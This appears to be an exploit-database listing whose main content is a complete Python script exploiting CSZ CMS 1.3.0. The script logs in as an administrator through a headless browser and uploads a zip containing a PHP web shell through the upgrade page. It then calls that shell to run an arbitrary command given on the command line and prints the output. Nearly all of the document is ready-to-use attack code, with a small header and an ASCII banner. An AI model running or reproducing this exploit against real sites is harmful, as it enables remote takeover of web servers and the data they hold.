Csz cms version 1.3.0 authenticated remote command execution Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2024-03-06 | Type : webapps | Platform : php


[+] Code ...

# Exploit Title: CSZ CMS Version 1.3.0 Remote Command Execution
# Date: 17/11/2023
# Exploit Author: tmrswrr
# Vendor Homepage: https://www.cszcms.com/
# Software Link: https://www.cszcms.com/link/3#https://sourceforge.net/projects/cszcms/files/latest/download
# Version: Version 1.3.0
# Tested on: https://www.softaculous.com/apps/cms/CSZ_CMS


import os
import zipfile
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.firefox.options import Options as FirefoxOptions
from selenium.webdriver.firefox.service import Service as FirefoxService
from webdriver_manager.firefox import GeckoDriverManager
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import NoSuchElementException, TimeoutException
import requests
from time import sleep
import sys
import random
import time
import platform
import tarfile
from io import BytesIO

email = "admin@admin.com"
password = "password"

class colors:
OKBLUE = '\033[94m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
CBLACK = '\33[30m'
CRED = '\33[31m'
CGREEN = '\33[32m'
CYELLOW = '\33[33m'
CBLUE = '\33[34m'
CVIOLET = '\33[35m'
CBEIGE = '\33[36m'
CWHITE = '\33[37m'


color_random = [colors.CBLUE, colors.CVIOLET, colors.CWHITE, colors.OKBLUE, colors.CGREEN, colors.WARNING,
colors.CRED, colors.CBEIGE]
random.shuffle(color_random)


def entryy():
x = color_random[0] + """

╭━━━┳━━━┳━━━━╮╭━━━┳━╮╭━┳━━━╮╭━━━┳━━━┳━━━╮╭━━━┳━╮╭━┳━━━┳╮╱╱╭━━━┳━━┳━━━━╮
┃╭━╮┃╭━╮┣━━╮━┃┃╭━╮┃┃╰╯┃┃╭━╮┃┃╭━╮┃╭━╮┃╭━━╯┃╭━━┻╮╰╯╭┫╭━╮┃┃╱╱┃╭━╮┣┫┣┫╭╮╭╮┃
┃┃╱╰┫╰━━╮╱╭╯╭╯┃┃╱╰┫╭╮╭╮┃╰━━╮┃╰━╯┃┃╱╰┫╰━━╮┃╰━━╮╰╮╭╯┃╰━╯┃┃╱╱┃┃╱┃┃┃┃╰╯┃┃╰╯
┃┃╱╭╋━━╮┃╭╯╭╯╱┃┃╱╭┫┃┃┃┃┣━━╮┃┃╭╮╭┫┃╱╭┫╭━━╯┃╭━━╯╭╯╰╮┃╭━━┫┃╱╭┫┃╱┃┃┃┃╱╱┃┃
┃╰━╯┃╰━╯┣╯━╰━╮┃╰━╯┃┃┃┃┃┃╰━╯┃┃┃┃╰┫╰━╯┃╰━━╮┃╰━━┳╯╭╮╰┫┃╱╱┃╰━╯┃╰━╯┣┫┣╮╱┃┃
╰━━━┻━━━┻━━━━╯╰━━━┻╯╰╯╰┻━━━╯╰╯╰━┻━━━┻━━━╯╰━━━┻━╯╰━┻╯╱╱╰━━━┻━━━┻━━╯╱╰╯

<< CSZ CMS Version 1.3.0 RCE >>
<< CODED BY TMRSWRR >>
<< GITHUB==>capture0x >>

\n"""
for c in x:
print(c, end='')
sys.stdout.flush()
sleep(0.0045)
oo = " " * 6 + 29 * "░⣿" + "\n\n"
for c in oo:
print(colors.CGREEN + c, end='')
sys.stdout.flush()
sleep(0.0065)

tt = " " * 5 + "░⣿" + " " * 6 + "WELCOME TO CSZ CMS Version 1.3.0 RCE Exploit" + " " * 7 + "░⣿" + "\n\n"
for c in tt:
print(colors.CWHITE + c, end='')
sys.stdout.flush()
sleep(0.0065)
xx = " " * 6 + 29 * "░⣿" + "\n\n"
for c in xx:
print(colors.CGREEN + c, end='')
sys.stdout.flush()
sleep(0.0065)

def check_geckodriver():
current_directory = os.path.dirname(os.path.abspath(__file__))
geckodriver_path = os.path.join(current_directory, 'geckodriver')

if not os.path.isfile(geckodriver_path):
red = "\033[91m"
reset = "\033[0m"
print(red + "\n\nGeckoDriver (geckodriver) is not available in the script's directory." + reset)
user_input = input("Would you like to download it now? (yes/no): ").lower()
if user_input == 'yes':
download_geckodriver(current_directory)
else:
print(red + "Please download GeckoDriver manually from: https://github.com/mozilla/geckodriver/releases" + reset)
sys.exit(1)

def download_geckodriver(directory):

print("[*] Detecting OS and architecture...")
os_name = platform.system().lower()
arch, _ = platform.architecture()

if os_name == "linux":
os_name = "linux"
arch = "64" if arch == "64bit" else "32"
elif os_name == "darwin":
os_name = "macos"
arch = "aarch64" if platform.processor() == "arm" else ""
elif os_name == "windows":
os_name = "win"
arch = "64" if arch == "64bit" else "32"
else:
print("[!] Unsupported operating system.")
sys.exit(1)

geckodriver_version = "v0.33.0"
geckodriver_file = f"geckodriver-{geckodriver_version}-{os_name}{arch}"
ext = "zip" if os_name == "win" else "tar.gz"
url = f"https://github.com/mozilla/geckodriver/releases/download/{geckodriver_version}/{geckodriver_file}.{ext}"

print(f"[*] Downloading GeckoDriver for {platform.system()} {arch}-bit...")
response = requests.get(url, stream=True)

if response.status_code == 200:
print("[*] Extracting GeckoDriver...")
if ext == "tar.gz":
with tarfile.open(fileobj=BytesIO(response.content), mode="r:gz") as tar:
tar.extractall(path=directory)
else:
with zipfile.ZipFile(BytesIO(response.content)) as zip_ref:
zip_ref.extractall(directory)
print("[+] GeckoDriver downloaded and extracted successfully.")
else:
print("[!] Failed to download GeckoDriver.")
sys.exit(1)

def create_zip_file(php_filename, zip_filename, php_code):
try:
with open(php_filename, 'w') as file:
file.write(php_code)
with zipfile.ZipFile(zip_filename, 'w') as zipf:
zipf.write(php_filename)
print("[+] Zip file created successfully.")
os.remove(php_filename)
return zip_filename
except Exception as e:
print(f"[!] Error creating zip file: {e}")
sys.exit(1)


def main(base_url, command):

if not base_url.endswith('/'):
base_url += '/'

zip_filename = None

check_geckodriver()
try:
firefox_options = FirefoxOptions()
firefox_options.add_argument("--headless")

script_directory = os.path.dirname(os.path.abspath(__file__))
geckodriver_path = os.path.join(script_directory, 'geckodriver')
service = FirefoxService(executable_path=geckodriver_path)
driver = webdriver.Firefox(service=service, options=firefox_options)
print("[*] Exploit initiated.")

# Login
driver.get(base_url + "admin/login")
print("[*] Accessing login page...")
driver.find_element(By.NAME, "email").send_keys(f"{email}")
driver.find_element(By.NAME, "password").send_keys(f"{password}")
driver.find_element(By.ID, "login_submit").click()
print("[*] Credentials submitted...")


try:
error_message = driver.find_element(By.XPATH, "//*[contains(text(), 'Email address/Password is incorrect')]")
if error_message.is_displayed():
print("[!] Login failed: Invalid credentials.")
driver.quit()
sys.exit(1)
except NoSuchElementException:
print("[+] Login successful.")

# File creation
print("[*] Preparing exploit files...")
php_code = f"<?php echo system('{command}'); ?>"
zip_filename = create_zip_file("exploit.php", "payload.zip", php_code)


driver.get(base_url + "admin/upgrade")
print("[*] Uploading exploit payload...")
file_input = driver.find_element(By.ID, "file_upload")
file_input.send_keys(os.path.join(os.getcwd(), zip_filename))

# Uploading
driver.find_element(By.ID, "submit").click()
WebDriverWait(driver, 10).until(EC.alert_is_present())
alert = driver.switch_to.alert
alert.accept()

# Exploit result
exploit_url = base_url + "exploit.php"
response = requests.get(exploit_url)
print(f"[+] Exploit response:\n\n{response.text}")

except Exception as e:
print(f"[!] Error: {e}")
finally:
driver.quit()
if zip_filename and os.path.exists(zip_filename):
os.remove(zip_filename)

if __name__ == "__main__":
entryy()
if len(sys.argv) < 3:
print("Usage: python script.py [BASE_URL] [COMMAND]")
else:
main(sys.argv[1], sys.argv[2])